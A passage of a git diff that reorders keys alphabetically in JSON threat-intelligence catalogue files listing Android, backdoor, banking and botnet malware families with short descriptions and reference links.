diff --git a/clusters/android.json b/clusters/android.json index fcdb7ae..93c0517 100644 --- a/clusters/android.json +++ b/clusters/android.json @@ -4463,8 +4463,6 @@ "https://researchcenter.paloaltonetworks.com/2018/04/unit42-henbox-inside-coop/" ] }, - "uuid": "72c37e24-4ead-11e8-8f08-db3ec8f8db86§", - "value": "HenBox", "related": [ { "dest-uuid": "36ee04f4-a9df-11e8-b92b-d7ddfd3a8896", @@ -4473,7 +4471,9 @@ ], "type": "similar" } - ] + ], + "uuid": "72c37e24-4ead-11e8-8f08-db3ec8f8db86§", + "value": "HenBox" }, { "description": "Cybercriminals are currently developing a new strain of malware targeting Android devices which blends the features of a banking trojan, keylogger, and mobile ransomware.", @@ -4496,24 +4496,24 @@ "value": "Skygofree" }, { - "value": "BusyGasper", "description": "A new family of spyware for Android grabbed the attention of security researchers through its unusual set of features and their original implementation. Tagged BusyGasper by security experts at Kaspersky, the malware stands out through its ability to monitor the various sensors present on the targeted phone. Based on the motion detection logs, it can recognize the opportune time for running and stopping its activity.", "meta": { "refs": [ "https://www.bleepingcomputer.com/news/security/unsophisticated-android-spyware-monitors-device-sensors/" ] }, - "uuid": "1c8e8070-bfe2-11e8-8c3e-7f31c66687a2" + "uuid": "1c8e8070-bfe2-11e8-8c3e-7f31c66687a2", + "value": "BusyGasper" }, { - "value": "Triout", "description": "Bitdefender says Triout samples they discovered were masquerading in a clone of a legitimate application, but they were unable to discover where this malicious app was being distributed from. The obvious guess would be via third-party Android app stores, or app-sharing forums, popular in some areas of the globe.", "meta": { "refs": [ "https://www.bleepingcomputer.com/news/security/new-android-triout-malware-can-record-phone-calls-steal-pictures/" ] }, - "uuid": "08965226-c8a9-11e8-ad82-b3fe44882268" + "uuid": "08965226-c8a9-11e8-ad82-b3fe44882268", + "value": "Triout" } ], "version": 14 diff --git a/clusters/backdoor.json b/clusters/backdoor.json index 60cf8ca..0908426 100644 --- a/clusters/backdoor.json +++ b/clusters/backdoor.json @@ -5,7 +5,6 @@ "description": "A list of backdoor malware.", "name": "Backdoor", "source": "Open Sources", - "version": 2, "type": "backdoor", "uuid": "75436e27-cb57-4f32-bf1d-9636dd78a2bf", "values": [ @@ -17,11 +16,10 @@ "https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html" ] }, - "value": "WellMess", - "uuid": "e0e79fab-0f1d-4fc2-b424-208cb019a9cd" + "uuid": "e0e79fab-0f1d-4fc2-b424-208cb019a9cd", + "value": "WellMess" }, { - "value": "Rosenbridge", "description": "The rosenbridge backdoor is a small, non-x86 core embedded alongside the main x86 core in the CPU. It is enabled by a model-specific-register control bit, and then toggled with a launch-instruction. The embedded core is then fed commands, wrapped in a specially formatted x86 instruction. The core executes these commands (which we call the 'deeply embedded instruction set'), bypassing all memory protections and privilege checks.\n\nWhile the backdoor should require kernel level access to activate, it has been observed to be enabled by default on some systems, allowing any unprivileged code to modify the kernel.\n\nThe rosenbridge backdoor is entirely distinct from other publicly known coprocessors on x86 CPUs, such as the Management Engine or Platform Security Processor; it is more deeply embedded than any known coprocessor, having access to not only all of the CPU's memory, but its register file and execution pipeline as well.", "meta": { "date": "August 2018", @@ -31,7 +29,9 @@ "https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Christopher%20Domas/DEFCON-26-Christopher-Domas-GOD-MODE-%20UNLOCKED-hardware-backdoors-in-x86-CPUs.pdf" ] }, - "uuid": "2bb165dc-9f93-11e8-ae64-d3dbab0dd786" + "uuid": "2bb165dc-9f93-11e8-ae64-d3dbab0dd786", + "value": "Rosenbridge" } - ] + ], + "version": 2 } diff --git a/clusters/banker.json b/clusters/banker.json index b3d6120..cbd6854 100644 --- a/clusters/banker.json +++ b/clusters/banker.json @@ -830,14 +830,14 @@ "value": "Kronos" }, { - "value": "CamuBot", "description": "A newly discovered banking Trojan departs from the regular tactics observed by malware researchers by choosing visible installation and by adding social engineering components.\nCamuBot appeared last month in Brazil targeting companies and organizations from the public sector. The victim is the one installing the malware, at the instructions of a human operator that pretends to be a bank employee.", "meta": { "refs": [ "https://www.bleepingcomputer.com/news/security/new-banking-trojan-poses-as-a-security-module/ " ] }, - "uuid": "2fafe8b2-b0db-11e8-a81e-4b62ee50bd87" + "uuid": "2fafe8b2-b0db-11e8-a81e-4b62ee50bd87", + "value": "CamuBot" } ], "version": 13 diff --git a/clusters/botnet.json b/clusters/botnet.json index 0b6c4a8..21ce037 100644 --- a/clusters/botnet.json +++ b/clusters/botnet.json @@ -842,7 +842,6 @@ "value": "Bamital" }, { - "value": "Gafgyt", "description": "Linux.Gafgyt is a Trojan horse that opens a back door on the compromised computer and steals information. The new Gafgyt version targets a newly disclosed vulnerability affecting older, unsupported versions of SonicWall’s Global Management System (GMS).", "meta": { "refs": [ @@ -853,10 +852,10 @@ "Bashlite" ] }, - "uuid": "40795af6-b721-11e8-9fcb-570c0b384135" + "uuid": "40795af6-b721-11e8-9fcb-570c0b384135", + "value": "Gafgyt" }, { - "value": "Sora", "description": "Big changes on the IoT malware scene. Security researchers have spotted a version of the Mirai IoT malware that can run on a vast range of architectures, and even on Android devices. This Mirai malware strain is called Sora, a strain that was first spotted at the start of the year.Initial versions were nothing out of the ordinary, and Sora's original author soon moved on to developing the Mirai Owari version, shortly after Sora's creation.", "meta": { "refs": [ @@ -889,27 +888,28 @@ "type": "variant-of" } ], - "uuid": "025ab0ce-bffc-11e8-be19-d70ec22c5d56" + "uuid": "025ab0ce-bffc-11e8-be19-d70ec22c5d56", + "value": "Sora" }, { - "value": "Torii", "description": " we have been observing a new malware strain, which we call Torii, that differs from Mirai and other botnets we know of, particularly in the advanced techniques it uses. The developers of the botnet seek wide coverage and for this purpose they created binaries for multiple CPU architectures, tailoring the malware for stealth and persistence.", "meta": { "refs": [ "https://blog.avast.com/new-torii-botnet-threat-research", "https://www.bleepingcomputer.com/news/security/new-iot-botnet-torii-uses-six-methods-for-persistence-has-no-clear-purpose/" ] - } + }, + "value": "Torii" }, { - "value": "Persirai", "description": "A new Internet of Things (IoT) botnet called Persirai (Detected by Trend Micro as ELF_PERSIRAI.A) has been discovered targeting over 1,000 Internet Protocol (IP) Camera models based on various Original Equipment Manufacturer (OEM) products. This development comes on the heels of Mirai—an open-source backdoor malware that caused some of the most notable incidents of 2016 via Distributed Denial-of-Service (DDoS) attacks that compromised IoT devices such as Digital Video Recorders (DVRs) and CCTV cameras—as well as the Hajime botnet.", "meta": { "refs": [ "https://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/" ] }, - "uuid": "e3e91fe2-c7ce-11e8-8e85-6bc15cd2a63c" + "uuid": "e3e91fe2-c7ce-11e8-8e85-6bc15cd2a63c", + "value": "Persirai" } ], "version": 15 diff --git a/clusters/branded_vulnerability.json b/clusters/branded_vulnerability.json index f3729e1..72786cb 100644 --- a/clusters/branded_vulnerability.json +++ b/clusters/branded_vulnerability.json @@ -149,13 +149,13 @@ "value": "ImageTragick" }, { + "description": "Blacknurse is a low bandwidth DDoS attack involving ICMP Type 3 Code 3 packets causing high CPU loads first discovered in November 2016. The earliest samples we have seen supporting this DDoS method are from September 2017.", "meta": { "logo": [ "http://blacknurse.dk/____impro/1/onewebmedia/blacknurse2.png?etag=W%2F%2214e7-5761287d%22&sourceContentType=image%2Fpng&ignoreAspectRatio&resize=200%2B200&extract=0%2B40%2B200%2B114" ] }, "uuid": "3c2325e4-b740-11e8-9504-b32b4d974add", - "description": "Blacknurse is a low bandwidth DDoS attack involving ICMP Type 3 Code 3 packets causing high CPU loads first discovered in November 2016. The earliest samples we have seen supporting this DDoS method are from September 2017.", "value": "Blacknurse" } ], diff --git a/clusters/malpedia.json b/clusters/malpedia.json index 6b59fe9..4786150 100644 --- a/clusters/malpedia.json +++ b/clusters/malpedia.json @@ -1,72 +1,74 @@ { - "description": "Malware galaxy cluster based on Malpedia.", - "type": "malpedia", "authors": [ "Daniel Plohmann", "Steffen Enders", "Andrea Garavaglia", "Davide Arcuri" ], + "description": "Malware galaxy cluster based on Malpedia.", + "name": "Malpedia", + "source": "Malpedia", + "type": "malpedia", + "uuid": "5fc98d08-90a4-498a-ad2e-0edf50ef374e", "values": [ { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.adultswine", "https://research.checkpoint.com/malware-displaying-porn-ads-discovered-in-game-apps-on-google-play/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "824f284b-b38b-4a57-9e4a-aee4061a5b2d", - "value": "AdultSwine", - "description": "" + "value": "AdultSwine" }, { + "description": "Androrat is a remote administration tool developed in Java Android for the client side and in Java/Swing for the Server. The name Androrat is a mix of Android and RAT (Remote Access Tool). It has been developed in a team of 4 for a university project. The goal of the application is to give the control of the android system remotely and retrieve informations from it.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.androrat", "https://hotforsecurity.bitdefender.com/blog/possibly-italy-born-android-rat-reported-in-china-find-bitdefender-researchers-16264.html", "https://github.com/DesignativeDave/androrat" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "80447111-8085-40a4-a052-420926091ac6", - "value": "AndroRAT", - "description": "Androrat is a remote administration tool developed in Java Android for the client side and in Java/Swing for the Server. The name Androrat is a mix of Android and RAT (Remote Access Tool). It has been developed in a team of 4 for a university project. The goal of the application is to give the control of the android system remotely and retrieve informations from it." + "value": "AndroRAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubisspy", "http://blog.trendmicro.com/trendlabs-security-intelligence/cyberespionage-campaign-sphinx-goes-mobile-anubisspy/", "https://documents.trendmicro.com/assets/tech-brief-cyberespionage-campaign-sphinx-goes-mobile-with-anubisspy.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "06ffb614-33ca-4b04-bf3b-623e68754184", - "value": "AnubisSpy", - "description": "" + "value": "AnubisSpy" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bahamut", "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/", "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9", - "value": "Bahamut", - "description": "" + "value": "Bahamut" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.bankbot", "http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html", @@ -74,47 +76,44 @@ "http://blog.koodous.com/2017/05/bankbot-on-google-play.html", "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/", "https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "85975621-5126-40cb-8083-55cbfa75121b", - "value": "BankBot", - "description": "" + "value": "BankBot" }, { + "description": "Catelites Bot (identified by Avast and SfyLabs in December 2017) is an Android trojan, with ties to CronBot. Once the malicious app is installed, attackers use social engineering tricks and window overlays to get credit card details from the victim.\r\nThe distribution vector seems to be fake apps from third-party app stores (not Google Play) or via malvertisement. After installation and activation, the app creates fake Gmail, Google Play and Chrome icons. Furthermore, the malware sends a fake system notification, telling the victim that they need to re-authenticate with Google Services and ask for their credit card details to be entered.\r\nCurrently the malware has overlays for over 2,200 apps of banks and financial institutions.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.catelites", "https://blog.avast.com/new-version-of-mobile-malware-catelites-possibly-linked-to-cron-cyber-gang", "https://www.youtube.com/watch?v=1LOy0ZyjEOk" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2c672b27-bc65-48ba-ba3d-6318473e78b6", - "value": "Catelites", - "description": "Catelites Bot (identified by Avast and SfyLabs in December 2017) is an Android trojan, with ties to CronBot. Once the malicious app is installed, attackers use social engineering tricks and window overlays to get credit card details from the victim.\r\nThe distribution vector seems to be fake apps from third-party app stores (not Google Play) or via malvertisement. After installation and activation, the app creates fake Gmail, Google Play and Chrome icons. Furthermore, the malware sends a fake system notification, telling the victim that they need to re-authenticate with Google Services and ask for their credit card details to be entered.\r\nCurrently the malware has overlays for over 2,200 apps of banks and financial institutions." + "value": "Catelites" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.charger", "http://blog.checkpoint.com/2017/01/24/charger-malware/", "http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6e0545df-8df6-4990-971c-e96c4c60d561", - "value": "Charger", - "description": "" + "value": "Charger" }, { + "description": "", "meta": { - "synonyms": [ - "Pegasus", - "JigglyPuff" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.chrysaor", "https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html", @@ -122,150 +121,153 @@ "https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html", "https://media.ccc.de/v/33c3-7901-pegasus_internals", "https://citizenlab.ca/2018/09/hide-and-seek-tracking-nso-groups-pegasus-spyware-to-operations-in-45-countries/" - ] + ], + "synonyms": [ + "Pegasus", + "JigglyPuff" + ], + "type": [] }, "uuid": "52acea22-7d88-433c-99e6-8fef1657e3ad", - "value": "Chrysaor", - "description": "" + "value": "Chrysaor" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.clientor", "https://twitter.com/LukasStefanko/status/1042297855602503681" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c0a48ca3-682d-45bc-805c-e62aecd4c724", - "value": "Clientor", - "description": "" + "value": "Clientor" }, { + "description": "", "meta": { - "synonyms": [ - "SpyBanker" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.connic", "https://www.welivesecurity.com/2017/12/11/banking-malware-targets-polish-banks/" - ] + ], + "synonyms": [ + "SpyBanker" + ], + "type": [] }, "uuid": "93b1c63a-4a34-44fd-805b-0a3470ff7e6a", - "value": "Connic", - "description": "" + "value": "Connic" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.cpuminer", "https://blog.trendmicro.com/trendlabs-security-intelligence/coin-miner-mobile-malware-returns-hits-google-play/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8a42a699-1746-498b-a558-e7113bb916c0", - "value": "Cpuminer", - "description": "" + "value": "Cpuminer" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.doublelocker", "https://www.welivesecurity.com/2017/10/13/doublelocker-innovative-android-malware/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "10d0115a-00b4-414e-972b-8320a2bb873c", - "value": "DoubleLocker", - "description": "" + "value": "DoubleLocker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dualtoy", "http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8269e779-db23-4c94-aafb-36ee94879417", - "value": "DualToy", - "description": "" + "value": "DualToy" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dvmap", "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e5de818e-d25d-47a8-ab31-55fc992bf91b", - "value": "Dvmap", - "description": "" + "value": "Dvmap" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.exobot", "https://securityintelligence.com/ibm-x-force-delves-into-exobots-leaked-source-code/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c9f2b058-6c22-462a-a20a-fca933a597dd", - "value": "ExoBot", - "description": "" + "value": "ExoBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexispy", "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4305d59a-0d07-4021-a902-e7996378898b", - "value": "FlexiSpy", - "description": "" + "value": "FlexiSpy" }, { + "description": "", "meta": { - "synonyms": [ - "gugi" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexnet", "https://twitter.com/LukasStefanko/status/886849558143279104" - ] + ], + "synonyms": [ + "gugi" + ], + "type": [] }, "uuid": "80d7d229-b3a7-4205-8304-f7b18bda129f", - "value": "FlexNet", - "description": "" + "value": "FlexNet" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ghostctrl", "https://blog.trendmicro.com/trendlabs-security-intelligence/android-backdoor-ghostctrl-can-silently-record-your-audio-video-and-more/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3b6c1771-6d20-4177-8be0-12116e254bf5", - "value": "GhostCtrl", - "description": "" + "value": "GhostCtrl" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.glancelove", "https://www.clearskysec.com/glancelove/", @@ -273,247 +275,247 @@ "https://www.idf.il/en/minisites/hamas/hamas-uses-fake-facebook-profiles-to-target-israeli-soldiers/", "https://securelist.com/breaking-the-weakest-link-of-the-strongest-chain/77562/", "https://www.ci-project.org/blog/2017/3/4/arid-viper" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "24a709ef-c2e4-45ca-90b6-dfa184472f49", - "value": "GlanceLove", - "description": "" + "value": "GlanceLove" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hero_rat", "https://www.welivesecurity.com/2018/06/18/new-telegram-abusing-android-rat/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "537f17ac-74e5-440b-8659-d4fdb4af41a6", - "value": "HeroRAT", - "description": "" + "value": "HeroRAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.irrat", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3e7c6e8c-46fc-4498-a28d-5b3d144c51cf", - "value": "IRRat", - "description": "" + "value": "IRRat" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.jaderat", "https://blog.lookout.com/mobile-threat-jaderat" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8804e02c-a139-4c3d-8901-03302ca1faa0", - "value": "JadeRAT", - "description": "" + "value": "JadeRAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.kevdroid", "https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html", "https://researchcenter.paloaltonetworks.com/2018/04/unit42-reaper-groups-updated-mobile-arsenal/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1e1924b5-89cb-408b-bcee-d6aaef7b24e0", - "value": "KevDroid", - "description": "" + "value": "KevDroid" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.koler", "https://twitter.com/LukasStefanko/status/928262059875213312" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4ff34778-de4b-4f48-9184-4975c8ccc3f3", - "value": "Koler", - "description": "" + "value": "Koler" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lazarus", "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0caf0292-b01a-4439-b56f-c75b71900bc0", - "value": "Lazarus", - "description": "" + "value": "Lazarus" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lazarus_elf", "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/#sf174581990" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fe6134aa-6588-4619-8447-57a44eb8b24c", - "value": "Lazarus ELF Backdoor", - "description": "" + "value": "Lazarus ELF Backdoor" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.loki", "http://blog.checkpoint.com/2017/03/10/preinstalled-malware-targeting-mobile-users/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a6f481fe-b6db-4507-bb3c-28f10d800e2f", - "value": "Loki", - "description": "" + "value": "Loki" }, { + "description": "Android banker Trojan with the standard banking capabilities such as overlays, SMS stealing. It also features ransomware functionality. Note, the network traffic is obfuscated the same way as in Android Bankbot.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot", "https://www.threatfabric.com/blogs/lokibot_the_first_hybrid_android_malware.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4793a29b-1191-4750-810e-9301a6576fc4", - "value": "LokiBot", - "description": "Android banker Trojan with the standard banking capabilities such as overlays, SMS stealing. It also features ransomware functionality. Note, the network traffic is obfuscated the same way as in Android Bankbot." + "value": "LokiBot" }, { + "description": "", "meta": { - "synonyms": [ - "ExoBot" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.marcher", "https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware", "https://www.clientsidedetection.com/marcher.html", "https://www.clientsidedetection.com/exobot_v2_update___staying_ahead_of_the_competition.html" - ] + ], + "synonyms": [ + "ExoBot" + ], + "type": [] }, "uuid": "f691663a-b360-4c0d-a4ee-e9203139c38e", - "value": "Marcher", - "description": "" + "value": "Marcher" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.mazarbot", "https://heimdalsecurity.com/blog/security-alert-mazar-bot-active-attacks-android-malware/", "https://b0n1.blogspot.de/2017/08/phishing-attack-at-raiffeisen-bank-by.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "38cbdc29-a5af-46ae-ab82-baf3f6999826", - "value": "MazarBot", - "description": "" + "value": "MazarBot" }, { + "description": "MysteryBot is an Android banking Trojan with overlay capabilities with support for Android 7/8 but also provides other features such as key logging and ransomware functionality.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.mysterybot", "https://www.threatfabric.com/blogs/mysterybot__a_new_android_banking_trojan_ready_for_android_7_and_8.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0a53ace4-98ae-442f-be64-b8e373948bde", - "value": "MysteryBot", - "description": "MysteryBot is an Android banking Trojan with overlay capabilities with support for Android 7/8 but also provides other features such as key logging and ransomware functionality." + "value": "MysteryBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.omnirat", "https://securityintelligence.com/news/omnirat-takes-over-android-devices-through-social-engineering-tricks/", "https://blog.avast.com/2015/11/05/droidjack-isnt-the-only-spying-software-out-there-avast-discovers-that-omnirat-is-currently-being-used-and-spread-by-criminals-to-gain-full-remote-co" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ec936d58-6607-4e33-aa97-0e587bbbdda5", - "value": "OmniRAT", - "description": "" + "value": "OmniRAT" }, { + "description": "", "meta": { - "synonyms": [ - "Popr-d30" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.popr-d30", "http://blog.crysys.hu/2017/01/technical-details-on-the-fancy-bear-android-malware-poprd30-apk/", "http://blog.crysys.hu/2017/03/update-on-the-fancy-bear-android-malware-poprd30-apk/" - ] + ], + "synonyms": [ + "Popr-d30" + ], + "type": [] }, "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", - "value": "X-Agent", - "description": "" + "value": "X-Agent" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.pornhub" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3272a8d8-8323-4e98-b6ce-cb40789a3616", - "value": "Fake Pornhub", - "description": "" + "value": "Fake Pornhub" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.raxir", "https://twitter.com/PhysicalDrive0/statuses/798825019316916224" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f5cabe73-b5d6-4503-8350-30a6d54c32ef", - "value": "Raxir", - "description": "" + "value": "Raxir" }, { + "description": "RedAlert 2 is an new Android malware used by an attacker to gain access to login credentials of various e-banking apps. The malware works by overlaying a login screen with a fake display that sends the credentials to a C2 server.\r\nThe malware also has the ability to block incoming calls from banks, to prevent the victim of being notified.\r\nAs a distribution vector RedAlert 2 uses third-party app stores and imitates real Android apps like Viber, Whatsapp or fake Adobe Flash Player updates.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.redalert2", "https://clientsidedetection.com/new_android_trojan_targeting_over_60_banks_and_social_apps.html", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/red-alert-2-0-android-trojan-spreads-via-third-party-app-stores" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e9aaab46-abb1-4390-b37b-d0457d05b28f", - "value": "RedAlert2", - "description": "RedAlert 2 is an new Android malware used by an attacker to gain access to login credentials of various e-banking apps. The malware works by overlaying a login screen with a fake display that sends the credentials to a C2 server.\r\nThe malware also has the ability to block incoming calls from banks, to prevent the victim of being notified.\r\nAs a distribution vector RedAlert 2 uses third-party app stores and imitates real Android apps like Viber, Whatsapp or fake Adobe Flash Player updates." + "value": "RedAlert2" }, { + "description": "The Android app using for Retefe is a SMS stealer, used to forward mTAN codes to the threat actor. Further is a bank logo added to the specific Android app to trick users into thinking this is a legitimate app. Moreover, if the victim is not a real victim, the link to download the APK is not the malicious APK, but the real 'Signal Private Messenger' tool, hence the victim's phone doesn't get infected.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.retefe", "http://blog.dornea.nu/2014/07/07/disect-android-apks-like-a-pro-static-code-analysis/", @@ -522,234 +524,234 @@ "http://blog.angelalonso.es/2015/11/reversing-sms-c-protocol-of-emmental.html", "https://www.govcert.admin.ch/blog/33/the-retefe-saga", "http://blog.angelalonso.es/2017/02/hunting-retefe-with-splunk-some24.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "22ef1e56-7778-41d1-9b2b-737aa5bf9777", - "value": "Retefe", - "description": "The Android app using for Retefe is a SMS stealer, used to forward mTAN codes to the threat actor. Further is a bank logo added to the specific Android app to trick users into thinking this is a legitimate app. Moreover, if the victim is not a real victim, the link to download the APK is not the malicious APK, but the real 'Signal Private Messenger' tool, hence the victim's phone doesn't get infected." + "value": "Retefe" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.roaming_mantis", "https://securelist.com/roaming-mantis-dabbles-in-mining-and-phishing-multilingually/85607/", "https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "31d2ce1f-44bf-4738-a41d-ddb43466cd82", - "value": "Roaming Mantis", - "description": "" + "value": "Roaming Mantis" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.rootnik", "https://blog.fortinet.com/2017/01/24/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-i-debugging-in-the-scope-of-native-layer", "https://blog.fortinet.com/2017/01/26/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-ii-analysis-of-the-scope-of-java" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "db3dcfd1-79d2-4c91-898f-5f2463d7c417", - "value": "Rootnik", - "description": "" + "value": "Rootnik" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.skygofree", "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/", "https://cdn.securelist.com/files/2018/01/Skygofree_appendix_eng.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f5fded3c-8f45-471a-a372-d8be101e1b22", - "value": "Skygofree", - "description": "" + "value": "Skygofree" }, { + "description": "", "meta": { - "synonyms": [ - "SlemBunk" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.slempo", "https://www.pcworld.com/article/3035725/source-code-for-powerful-android-banking-malware-is-leaked.html", 